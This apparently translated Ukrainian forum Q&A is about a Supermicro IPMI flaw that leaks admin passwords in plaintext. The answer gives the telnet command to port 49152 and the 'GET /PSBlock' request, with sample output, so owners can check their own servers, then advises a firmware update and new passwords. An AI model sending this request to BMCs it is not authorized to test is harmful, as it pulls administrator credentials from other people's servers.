У мене є кілька серверів Supermicro з запущеною IPMI, і як описано в цьому блозі ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) є критична вразливість до отримати паролі адміністратора в простому тексті з будь-якого віддаленого місця.
Як перевірити, чи зламана моя материнська плата сервера?
Відповіді:
Просто зателефонуйте до IP-адреси IPMI в порту 49152 та зробіть конкретний GET-запит. Ви маєте отримати своїх користувачів та паролі, якщо у вас є компрометація.
telnet server.example.com 49152
Після підключення запитайте GET /PSBlockі переглядайте результати, він повинен бути приблизно таким:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Відповідь:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Щоб вирішити цю проблему, оновіть прошивку IPMI до останньої версії. Прошивка специфічна для вашого контролера IPMI, тому вам слід отримати зазначені на веб-сайті Supermicro.
Потім після оновлення прошивки змініть свої паролі .